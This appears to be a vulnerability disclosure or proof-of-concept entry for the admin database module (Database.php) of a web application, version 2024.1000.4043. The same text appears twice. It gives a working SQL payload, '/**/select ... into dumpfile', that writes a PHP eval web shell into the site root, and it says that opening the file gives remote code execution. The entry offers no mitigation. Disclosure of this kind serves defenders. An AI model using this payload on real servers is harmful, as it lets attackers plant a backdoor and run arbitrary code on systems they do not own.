description
The input box for executing SQL statements in the backend database module can allow for bypassing, leading to the execution of a web shell and thereby achieving file upload.
The vulnerable directory is as follows:application\admin\controller\Database.php
process
The following sentence should be entered into the input box:
/**/select '<?php @eval($_POST[1]);' into dumpfile 'root directory/1.php'
result
Accessing the filename of the file just uploaded to the website's root directory can achieve Remote Code Execution (RCE).
POC
version 2024.1000.4043
description The input box for executing SQL statements in the backend database module can allow for bypassing, leading to the execution of a web shell and thereby achieving file upload. The vulnerable directory is as follows:application\admin\controller\Database.php
process The following sentence should be entered into the input box: /**/select '<?php @eval($_POST[1]);' into dumpfile 'root directory/1.php'
result Accessing the filename of the file just uploaded to the website's root directory can achieve Remote Code Execution (RCE).
screenshot 1、upload 2、access